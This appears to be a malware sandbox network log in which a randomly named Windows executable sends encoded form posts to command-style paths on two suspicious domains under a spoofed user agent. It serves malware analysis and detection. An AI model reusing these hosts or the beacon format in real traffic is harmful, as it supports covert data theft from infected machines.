                                                                                                                                                                                Nov 29, 2024 09:16:29.258795023 CET683INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:29 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Encoding: br
                                                                                                                                                                                Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 74 39 ad 1c b5 70 c1 12 27 79 52 f3 a9 bf 55 d1 77 ed c0 39 51 27 3a d5 c8 06 df 2c 39 71 c0 13 2e 8f ba d1 4f 78 d5 39 3c fd e7 26 d0 b5 0b 89 41 90 53 12 98 e6 a4 87 5a 8d 01 7e 52 71 3c c3 24 53 6e 41 fb 0b 08 9a 16 bb b1 50 be e9 4b 59 4e 30 72 16 81 05 38 e5 e4 e7 77 6d f3 90 61 01 a5 88 75 70 10 e4 ca b8 74 e0 b0 a4 2d 8e 72 84 fe 21 ee bb ff 2e 12 4f 6e 1b a0 03 5c 2b 56 7e 7e 63 2b 23 29 67 8d 96 75 fd fc dc 0a b1 bf f4 f7 f4 1f 26 73 29 af e7 73 b5 bb f4 e1 2b c3 3c 76 12 42 ec 25 af 7d cb be 6f 7b ed c3 10 b9 50 06 51 de d8 4f ff 7d 09 39 ac 20 44 e1 c5 51 01 0d 82 28 1f 76 39 1b 12 fa 1f 6f 4f 49 80 fe 03 fa 3c cb b4 12 96 0b 15 45 b1 4d 45 5e 9a 3c c9 0a 61 75 26 b8 4e 21 c2 3a e6 b5 28 93 34 35 b1 73 ae cc 4d 22 44 5a 0a 9e 89 38 2b 33 9d 0a 5f f2 06 32 8f 7d ec 0b ad 23 a5 72 e5 0b 11 5b 95 a6 22 16 36 4a 7d 11 9b 22 15 2d ae ed c4 4c 1b 5d 01 4c 49 f8 fb bb 74 8b a5 84 21 d2 90 c0 ce 5f df 7f 50 eb cc 7c 37 5d 06 06 c7 58 61 8d 50 08 6b c0 cc 0f 65 bb [TRUNCATED]
                                                                                                                                                                                Data Ascii: 1b98 t9p'yRUw9Q':,9q.Ox9<&ASZ~Rq<$SnAPKYN0r8wmaupt-r!.On\+V~~c+#)gu&s)s+<vB%}o{PQO}9 DQ(v9oOI<EME^<au&N!:(45sM"DZ8+3_2}#r["6J}"-L]LIt!_P|7]XaPke 3$)@TYVex|o|&'"ngS6`(y.k%3@O%/7.>`2JAdJ[hT0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                7192.168.2.449814185.27.134.206801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:16:30.590215921 CET10898OUTPOST /4d2l/ HTTP/1.1
                                                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.canadavinreport.site
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.canadavinreport.site/4d2l/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 55 45 70 4a 2b 38 42 77 62 64 33 52 52 70 6f 58 74 67 49 4b 74 6d 77 74 50 5a 65 75 52 67 4a 68 37 39 41 2f 4e 2f 4e 47 42 5a 6e 38 31 5a 76 54 47 36 77 70 68 6c 50 46 57 51 6c 6d 42 72 75 54 70 78 2f 50 71 68 36 2f 6b 31 31 38 59 30 4c 66 32 50 70 4e 4d 5a 30 36 79 4f 4c 4f 62 55 64 63 74 58 39 63 4b 62 5a 32 37 48 72 38 64 63 4a 4c 2f 2b 39 70 33 31 33 6c 75 59 50 69 65 75 67 6a 69 69 33 75 6f 6f 63 49 70 48 46 41 55 79 55 64 64 59 4e 4d 54 69 62 49 71 4f 42 54 6c 61 67 32 50 6b 61 38 6a 59 79 74 61 52 5a 32 37 6b 41 33 6b 33 36 33 76 33 34 59 64 57 41 66 64 6e 42 53 68 77 49 59 48 65 59 70 48 54 5a 74 52 56 57 70 35 46 4c 54 6a 79 67 6c 2b 63 61 5a 39 56 6f 64 49 7a 75 71 77 76 77 76 34 64 78 6d 63 42 6f 77 5a 55 62 32 36 69 74 6c 68 46 4d 41 66 56 44 2f 4f 4a 4b 50 48 47 76 6a 65 47 39 67 6b 70 42 47 70 6f 49 54 49 33 74 57 34 61 36 65 38 47 51 41 74 61 36 51 52 31 32 4a 33 31 66 61 38 48 6d 7a 57 44 42 33 34 7a 38 79 53 46 51 36 76 55 69 34 72 33 68 63 46 6d 48 34 5a 71 70 39 [TRUNCATED]
                                                                                                                                                                                Data Ascii: JZOtU=UEpJ+8Bwbd3RRpoXtgIKtmwtPZeuRgJh79A/N/NGBZn81ZvTG6wphlPFWQlmBruTpx/Pqh6/k118Y0Lf2PpNMZ06yOLObUdctX9cKbZ27Hr8dcJL/+9p313luYPieugjii3uoocIpHFAUyUddYNMTibIqOBTlag2Pka8jYytaRZ27kA3k363v34YdWAfdnBShwIYHeYpHTZtRVWp5FLTjygl+caZ9VodIzuqwvwv4dxmcBowZUb26itlhFMAfVD/OJKPHGvjeG9gkpBGpoITI3tW4a6e8GQAta6QR12J31fa8HmzWDB34z8ySFQ6vUi4r3hcFmH4Zqp9amHRvV0jJljVNbJCIoYR4e38OQsuUH1fUIy6xyDr0hUPfxWow0H7f/wyNi0q4daqiF4cN57ClihR/GPauYWIrx3tbXV7PJUL7ZJthRqkvbAEDUMsw7CufLilknxuHuPN/EqRVKJsQBQpbSPRM/yS1u8RSbB8UUBfDLrFjhh+Zhiqs+Sf6kKxWSpKmTTPzWWxToF3C2Nx6zdstlDIXGUrpafd0G/hxV3sLrhtjEecsl91tnVIy3uDRexxwpcMzCwN1sYFSmNgLzPASYpL5WNywZn6/NyTZs7VfBC1Ovi9nSRMA9/QJnxB93okrtwjiD4iFDgT45ES86Zv5ML/q2yTQ/1bKqmYq7Tl4zRo1XzAoCSw03aXx7+WDDfFPcTXoyPA9jNYFrjO0EOh2+oQrd3FfvhOrOZj+ac1woKPiZoF190ho7OwHv9ZaUzuac6J23DrNyksC50v/s0UDICstfa3iC/S3Gi0Xdsx6ayhCqZTtfI923T4eG/Io6ISWvT464XtLZ5LSbtRu+0dLXqFNd3rej/IRc/lRagDY7OEX3hUbd55jmmrpKvCjym9af/JKMAS+HNEaLNAXq9TYCoF3cWKSG6wYt0lxyPHZarbr7NzzCqkN8ETUJDNkoKVi+okaoL+ZmmE/U7EuTdJ2R7RNT80mV+R7A/m0P0Xkl [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:16:31.873907089 CET683INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:31 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Encoding: br
                                                                                                                                                                                Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 74 39 ad 1c b5 70 c1 12 27 79 52 f3 a9 bf 55 d1 77 ed c0 39 51 27 3a d5 c8 06 df 2c 39 71 c0 13 2e 8f ba d1 4f 78 d5 39 3c fd e7 26 d0 b5 0b 89 41 90 53 12 98 e6 a4 87 5a 8d 01 7e 52 71 3c c3 24 53 6e 41 fb 0b 08 9a 16 bb b1 50 be e9 4b 59 4e 30 72 16 81 05 38 e5 e4 e7 77 6d f3 90 61 01 a5 88 75 70 10 e4 ca b8 74 e0 b0 a4 2d 8e 72 84 fe 21 ee bb ff 2e 12 4f 6e 1b a0 03 5c 2b 56 7e 7e 63 2b 23 29 67 8d 96 75 fd fc dc 0a b1 bf f4 f7 f4 1f 26 73 29 af e7 73 b5 bb f4 e1 2b c3 3c 76 12 42 ec 25 af 7d cb be 6f 7b ed c3 10 b9 50 06 51 de d8 4f ff 7d 09 39 ac 20 44 e1 c5 51 01 0d 82 28 1f 76 39 1b 12 fa 1f 6f 4f 49 80 fe 03 fa 3c cb b4 12 96 0b 15 45 b1 4d 45 5e 9a 3c c9 0a 61 75 26 b8 4e 21 c2 3a e6 b5 28 93 34 35 b1 73 ae cc 4d 22 44 5a 0a 9e 89 38 2b 33 9d 0a 5f f2 06 32 8f 7d ec 0b ad 23 a5 72 e5 0b 11 5b 95 a6 22 16 36 4a 7d 11 9b 22 15 2d ae ed c4 4c 1b 5d 01 4c 49 f8 fb bb 74 8b a5 84 21 d2 90 c0 ce 5f df 7f 50 eb cc 7c 37 5d 06 06 c7 58 61 8d 50 08 6b c0 cc 0f 65 bb [TRUNCATED]
                                                                                                                                                                                Data Ascii: 1b98 t9p'yRUw9Q':,9q.Ox9<&ASZ~Rq<$SnAPKYN0r8wmaupt-r!.On\+V~~c+#)gu&s)s+<vB%}o{PQO}9 DQ(v9oOI<EME^<au&N!:(45sM"DZ8+3_2}#r["6J}"-L]LIt!_P|7]XaPke 3$)@TYVex|o|&'"ngS6`(y.k%3@O%/7.>`2JAdJ[hT0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                8192.168.2.449820185.27.134.206801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:16:33.240598917 CET514OUTGET /4d2l/?JZOtU=ZGBp9LUVeZbORokkig5UphI/K+ukJjVB5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMbIb+djSawZii0sFb5ZetUXWQKN4yoB6m0o=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:16:34.787221909 CET1182INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:34 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 981
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("f2f7bb1aa6af792da44929d14f72c749");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/4d2l/?JZOtU=ZGBp9LUVeZbORokkig5UphI/K+ukJjVB5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMbIb+djSawZii0sFb5ZetUXWQKN4yoB6m0o=&Tr=kdnPUNSPd0&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                9192.168.2.449860104.21.90.137801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:16:50.228120089 CET787OUTPOST /eaqq/ HTTP/1.1
                                                                                                                                                                                Host: www.ana-silverco.shop
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.ana-silverco.shop
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.ana-silverco.shop/eaqq/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 41 7a 47 37 54 54 48 74 2b 67 39 30 4d 4a 51 36 4c 59 37 2b 31 68 58 6e 58 33 35 7a 72 6d 69 77 6a 30 78 6d 33 38 2b 2f 46 32 6b 5a 51 48 72 37 4e 73 66 69 76 31 63 54 61 38 64 4f 4e 2f 41 72 51 6b 62 4e 4a 55 64 49 4d 4d 76 33 75 54 56 6e 45 6b 6f 56 52 5a 43 4f 50 71 6c 42 53 36 71 64 54 79 54 6c 63 53 66 39 56 50 77 49 54 6d 34 64 65 44 65 44 79 73 53 4b 64 4f 4e 72 43 44 6d 31 66 49 49 70 57 73 76 45 49 42 6d 6a 52 77 62 2f 31 2f 77 31 63 61 46 6e 70 70 52 45 74 56 35 41 6b 78 67 4a 62 6c 66 41 36 49 42 48 69 52 35 4f 70 48 58 34 43 69 61 41 74 77 6f 37 4b 77 2b 4a 36 51 3d 3d
                                                                                                                                                                                Data Ascii: JZOtU=AzG7TTHt+g90MJQ6LY7+1hXnX35zrmiwj0xm38+/F2kZQHr7Nsfiv1cTa8dON/ArQkbNJUdIMMv3uTVnEkoVRZCOPqlBS6qdTyTlcSf9VPwITm4deDeDysSKdONrCDm1fIIpWsvEIBmjRwb/1/w1caFnppREtV5AkxgJblfA6IBHiR5OpHX4CiaAtwo7Kw+J6Q==
                                                                                                                                                                                Nov 29, 2024 09:16:51.341444016 CET905INHTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:51 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLS0Lu0gqL6tzqnbwqC5QEw7DbKy6XrI0qZVTtuLgooDy69F0WfMwDLoS%2BVJ9ZcL2mQhYRsywsOsYW1ArnytYh%2FjfbJ70z%2BWHsDS%2FSAgwsbOFvejD%2FYm1ImETG3bvqGlArpV7lYlGJw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8ea1286f99d743f3-EWR
                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2098&min_rtt=2098&rtt_var=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=787&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 190


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                10192.168.2.449866104.21.90.137801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:16:52.890108109 CET807OUTPOST /eaqq/ HTTP/1.1
                                                                                                                                                                                Host: www.ana-silverco.shop
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.ana-silverco.shop
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.ana-silverco.shop/eaqq/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 41 7a 47 37 54 54 48 74 2b 67 39 30 4f 70 67 36 51 37 44 2b 35 52 58 6b 59 58 35 7a 35 6d 6a 59 6a 30 4e 6d 33 39 71 76 43 45 77 5a 51 6d 62 37 4d 74 66 69 73 31 63 54 51 63 64 50 44 66 41 67 51 6b 47 77 4a 56 68 49 4d 4d 72 33 75 53 6c 6e 46 55 55 57 54 4a 43 4d 61 36 6c 44 63 61 71 64 54 79 54 6c 63 53 4b 71 56 50 6f 49 54 57 49 64 59 69 65 63 38 4d 53 4a 4e 2b 4e 72 52 54 6e 38 66 49 49 78 57 74 7a 75 49 44 65 6a 52 77 4c 2f 30 75 77 32 4a 4b 46 68 32 5a 51 7a 6d 47 63 62 74 68 5a 43 59 45 62 59 38 49 78 66 6e 58 30 55 34 32 32 76 51 69 2b 7a 77 33 68 50 48 7a 44 41 68 61 50 4e 58 32 78 36 75 41 61 6b 53 45 58 2f 6a 76 43 4d 58 62 49 3d
                                                                                                                                                                                Data Ascii: JZOtU=AzG7TTHt+g90Opg6Q7D+5RXkYX5z5mjYj0Nm39qvCEwZQmb7Mtfis1cTQcdPDfAgQkGwJVhIMMr3uSlnFUUWTJCMa6lDcaqdTyTlcSKqVPoITWIdYiec8MSJN+NrRTn8fIIxWtzuIDejRwL/0uw2JKFh2ZQzmGcbthZCYEbY8IxfnX0U422vQi+zw3hPHzDAhaPNX2x6uAakSEX/jvCMXbI=
                                                                                                                                                                                Nov 29, 2024 09:16:54.018141985 CET904INHTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:53 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7CggccxsnXW%2FhR0TLeo3isDXG0YO%2BU95m02KrP0%2FlwXJBfHFrDD8CsGNsYNJFeYyQJ2UPf346%2BBXIpyxLCsnTQ78217dWrkbPm0%2FPzX7v0YRj2Rz0BmKLHbZyiUwj9mo6xA8136a0U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8ea128804e011a48-EWR
                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1995&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=807&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 190


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                11192.168.2.449872104.21.90.137801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:16:55.600591898 CET10889OUTPOST /eaqq/ HTTP/1.1
                                                                                                                                                                                Host: www.ana-silverco.shop
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.ana-silverco.shop
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.ana-silverco.shop/eaqq/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 41 7a 47 37 54 54 48 74 2b 67 39 30 4f 70 67 36 51 37 44 2b 35 52 58 6b 59 58 35 7a 35 6d 6a 59 6a 30 4e 6d 33 39 71 76 43 45 6f 5a 51 78 7a 37 4e 4f 33 69 74 31 63 54 57 73 64 43 44 66 41 35 51 6b 66 37 4a 56 74 59 4d 4a 33 33 75 77 74 6e 4d 47 77 57 61 4a 43 4d 46 4b 6c 47 53 36 71 45 54 32 2f 68 63 52 79 71 56 50 6f 49 54 56 51 64 66 7a 65 63 2b 4d 53 4b 64 4f 4e 2f 43 44 6d 56 66 4a 67 50 57 74 33 55 49 79 2b 6a 51 52 37 2f 35 34 4d 32 55 36 46 6a 31 5a 51 72 6d 47 67 2b 74 68 46 6f 59 45 76 69 38 4c 74 66 6d 47 52 30 67 58 79 4c 53 54 66 75 69 32 42 35 44 79 4c 6e 6b 64 54 48 55 58 35 62 32 7a 75 37 58 6a 43 70 78 2b 62 48 41 76 78 73 4e 48 71 68 4f 68 34 48 34 52 78 4e 43 6d 79 69 6c 76 4a 64 37 6f 52 2f 76 46 76 55 4f 35 71 59 35 30 43 64 39 34 56 74 67 4e 4e 30 4d 73 44 4b 75 6c 69 4b 73 41 55 66 51 59 5a 45 76 72 34 62 2b 56 47 66 5a 38 54 2f 68 41 4c 37 36 37 6c 58 72 4f 4d 54 52 70 6d 43 2b 70 63 73 57 4c 35 2f 65 4b 64 37 4f 52 4a 4f 49 64 6e 64 43 48 49 35 77 34 76 5a [TRUNCATED]
                                                                                                                                                                                Data Ascii: JZOtU=AzG7TTHt+g90Opg6Q7D+5RXkYX5z5mjYj0Nm39qvCEoZQxz7NO3it1cTWsdCDfA5Qkf7JVtYMJ33uwtnMGwWaJCMFKlGS6qET2/hcRyqVPoITVQdfzec+MSKdON/CDmVfJgPWt3UIy+jQR7/54M2U6Fj1ZQrmGg+thFoYEvi8LtfmGR0gXyLSTfui2B5DyLnkdTHUX5b2zu7XjCpx+bHAvxsNHqhOh4H4RxNCmyilvJd7oR/vFvUO5qY50Cd94VtgNN0MsDKuliKsAUfQYZEvr4b+VGfZ8T/hAL767lXrOMTRpmC+pcsWL5/eKd7ORJOIdndCHI5w4vZB+1QJLmQ2A/1HMQKKJFK1fsePmJ+W07gE8OgOYsdC4L+6msPrHjEjRamv1tQ+Z1Kol2Es7DZ9YeKkDtalAha/Rc5+QVA8GcpuNMy7pooQ18RIHFmm/dNAbpZ4tcgc5EsQQ54Q/G3PQ4N6S/f3OwdLmtr0k92zK4Eq669g37hO2A2BkvMeLJYp+5XithWjY0FNNoCMTphBUHETnhnkVvRD4eTC6cv6IcJxNOGHQg6SE29HGaaTODwvKfwx2GcRO2Q+RfrSKZzEwbMCQ/9/ZUTB4+z0UtxLHlPVFQB220KZK2OC2LV1Y+fEePoidrtIC+bUlX3DrBu2uf+zVmOimyIjoRirctuZYUkmDLECYOWozLwfzz6o+yVaHaWaQ0mkoFziVF8a4TPM//RHhsTMvxQiKar9H+tjpHm+N83F+W21jAizRlGKuvarRI2scA0EIGX+7bV9jmTOZDAqMD+grZ95/EaLe0IsAoUM7zav2Old9CHYrH1MKTkqDVULT9xmcTSRQmC5IHMc9VO4VQUTkp4jYg4OOKVSqaQIl3MwSQkIgNMkpqbo993LAxwRk2TWC1CefbIQb/BMyhm3hdGNJzoQxhS74w/tAqaFsWMI4vgFdKJ9+THhcI0ojquFSyoTm1jy+hKv8PmTt3vibq1TuRpJf12yUfqf5AYK7 [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:16:56.776603937 CET901INHTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:56 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYIhPh5v91Vr9cSSWglbYsqmgEjmFNNTRNR9DFBZZYyXgQSJYG%2BqypCdB7%2FbvwFgNfBnDWmd1MXkIp66zuJryFxLmbksWF73QJgMtCqSQ6MeX8P6cdsIlGG5COl1AMNrSJTRKiIvxn4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8ea128917f277293-EWR
                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1974&rtt_var=987&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10889&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
